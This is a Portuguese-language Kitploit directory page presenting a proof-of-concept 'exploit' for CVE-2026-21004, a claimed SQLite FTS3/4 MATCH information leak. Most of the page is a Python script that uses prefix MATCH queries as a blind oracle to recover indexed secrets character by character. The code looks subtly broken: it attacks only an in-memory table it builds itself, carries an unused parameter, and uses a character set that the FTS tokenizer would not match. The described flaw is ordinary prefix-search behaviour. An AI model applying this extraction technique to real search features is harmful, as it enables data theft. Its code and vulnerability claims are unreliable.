Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-21004-SQLite-FTS3-Match-Infoleak-via-Query-Crafting — Prova de conceito de exploit para CVE-2026-21004: usa consultas de prefixo MATCH FTS3/4 do SQLite criadas sob medida como um oráculo cego para recuperar dados secretos indexados caractere por caractere. | Kitploit
Ferramentas/GitHubGitHub/george0papasotiriou/cve-2026-21004-sqlite-fts3-match-infoleak-via-query-crafting
Análise de VulnerabilidadesExploraçãoExfiltração de DadosSegurança de Banco de Dados
GitHubgeorge0papasotiriou/cve-2026-21004-sqlite-fts3-match-infoleak-via-query-crafting

CVE-2026-21004-SQLite-FTS3-Match-Infoleak-via-Query-Crafting

Prova de conceito de exploit para CVE-2026-21004: usa consultas de prefixo MATCH FTS3/4 do SQLite criadas sob medida como um oráculo cego para recuperar dados secretos indexados caractere por caractere.

Ver Repositório
4há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-21004 – Vazamento de Informações do Match FTS3 do SQLite via Manipulação de Consultas

Código do Programa (Python)

root@kitploit:~
# sqlite_fts_leak.py - Creates FTS table and exploits match info
import sqlite3

conn = sqlite3.connect(':memory:')
conn.execute("CREATE VIRTUAL TABLE secrets USING fts4(content TEXT)")
conn.execute("INSERT INTO secrets VALUES ('admin:password123')")
conn.execute("INSERT INTO secrets VALUES ('user:secret456')")

# Attacker guesses characters using FTS MATCH with partial matching
def guess_char(prefix, known):
    for c in "abcdefghijklmnopqrstuvwxyz0123456789_:":
        query = f'SELECT * FROM secrets WHERE content MATCH ?'
        # In FTS4, MATCH can leak whether a term exists; we abuse by searching column directly
        try:
            cur = conn.execute(query, (f'"{prefix}{c}*"',))
            if cur.fetchone():
                return c
        except:
            pass
    return None

# Recover the secret character by character
prefix = ""
for _ in range(20):
    c = guess_char(prefix, "")
    if c is None: break
    prefix += c
print(f"Recovered: {prefix}")

CVE-2026-21004 – Vazamento de Informações do Match SQLite FTS3/4

Severity: High

Visão Geral

Um aplicativo que usa SQLite FTS4 expõe uma função de busca que retorna resultados com base em uma consulta MATCH. Ao observar se ocorre uma correspondência (ou diferenças de tempo), um atacante pode realizar um ataque de força bruta no conteúdo do índice de texto completo, caractere por caractere, extraindo dados confidenciais.

Detalhes da Vulnerabilidade

  • Tipo: Divulgação de Informações / Injeção Cega
  • Impacto: Exfiltração de dados de colunas indexadas.
  • Causa Raiz: O operador FTS MATCH suporta consultas de prefixo (term*), permitindo que um atacante execute um ataque de dicionário sem conhecer o termo completo.

Demonstração do Exploit

Execute o exploit:

root@kitploit:~
python sqlite_fts_leak.py

O script recupera progressivamente o conteúdo da tabela secrets.

Baixar ferramenta